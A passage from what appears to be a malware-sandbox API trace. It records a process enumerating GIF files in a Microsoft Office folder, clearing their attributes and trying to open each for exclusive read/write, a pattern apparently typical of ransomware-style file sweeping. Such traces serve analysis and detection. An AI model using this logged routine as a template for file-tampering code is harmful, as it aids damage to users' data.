Office\\Office14\\1033\\PUBSPAPR\\ZPDIR40F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir40f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.441] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.441] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.441] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.441] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR41F.GIF", dwFileAttributes=0x80) returned 0 [0136.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR41F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir41f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.442] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.442] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.442] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.442] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR42F.GIF", dwFileAttributes=0x80) returned 0 [0136.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR42F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir42f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.443] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.443] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.443] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.443] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR43B.GIF", dwFileAttributes=0x80) returned 0 [0136.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR43B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir43b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.444] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.444] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.444] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.444] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.444] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR43F.GIF", dwFileAttributes=0x80) returned 0 [0136.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR43F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir43f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.445] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.445] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR44B.GIF", dwFileAttributes=0x80) returned 0 [0136.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR44B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir44b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.445] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.445] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.446] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.446] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR44F.GIF", dwFileAttributes=0x80) returned 0 [0136.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR44F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir44f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.447] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.447] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.447] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.447] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR45B.GIF", dwFileAttributes=0x80) returned 0 [0136.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR45B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir45b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.447] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.447] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.448] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.448] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR45F.GIF", dwFileAttributes=0x80) returned 0 [0136.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR45F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir45f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.448] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.448] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.448] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.448] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR46B.GIF", dwFileAttributes=0x80) returned 0 [0136.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR46B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir46b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.449] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.449] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.449] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.449] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR46F.GIF", dwFileAttributes=0x80) returned 0 [0136.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR46F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir46f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.450] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.450] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.451] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.451] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR47B.GIF", dwFileAttributes=0x80) returned 0 [0136.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR47B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir47b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.451] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.451] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.451] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.451] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR47F.GIF", dwFileAttributes=0x80) returned 0 [0136.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR47F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir47f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.452] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.452] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.452] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.452] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR48B.GIF", dwFileAttributes=0x80) returned 0 [0136.453] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR48B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir48b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.453] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.453] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.453] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.453] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR48F.GIF", dwFileAttributes=0x80) returned 0 [0136.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR48F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir48f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.454] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.454] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.454] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR49B.GIF", dwFileAttributes=0x80) returned 0 [0136.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR49B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir49b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.455] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.455] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.455] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.455] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR49F.GIF", dwFileAttributes=0x80) returned 0 [0136.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR49F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir49f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.456] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.456] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.456] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.456] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR4B.GIF", dwFileAttributes=0x80) returned 0 [0136.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR4B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir4b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.456] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.456] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.457] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.457] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR4F.GIF", dwFileAttributes=0x80) returned 0 [0136.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR4F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir4f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.458] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.458] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.458] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.458] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR50B.GIF", dwFileAttributes=0x80) returned 0 [0136.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR50B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir50b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.459] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.459] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.459] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.459] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR50F.GIF", dwFileAttributes=0x80) returned 0 [0136.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR50F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir50f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.459] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.459] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.460] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR51B.GIF", dwFileAttributes=0x80) returned 0 [0136.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR51B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir51b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.460] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.460] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.460] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR51F.GIF", dwFileAttributes=0x80) returned 0 [0136.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR51F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir51f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.461] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.462] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.462] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR5B.GIF", dwFileAttributes=0x80) returned 0 [0136.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR5B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir5b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.462] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.462] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.462] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.462] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR5F.GIF", dwFileAttributes=0x80) returned 0 [0136.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR5F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir5f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.463] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.463] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.463] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.463] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR6B.GIF", dwFileAttributes=0x80) returned 0 [0136.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR6B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir6b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.464] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR6F.GIF", dwFileAttributes=0x80) returned 0 [0136.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR6F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir6f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.465] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.465] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR7B.GIF", dwFileAttributes=0x80) returned 0 [0136.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR7B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir7b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.466] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.466] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR7F.GIF", dwFileAttributes=0x80) returned 0 [0136.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR7F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir7f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.466] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.466] VirtualFree (lpAddress=0x350000, 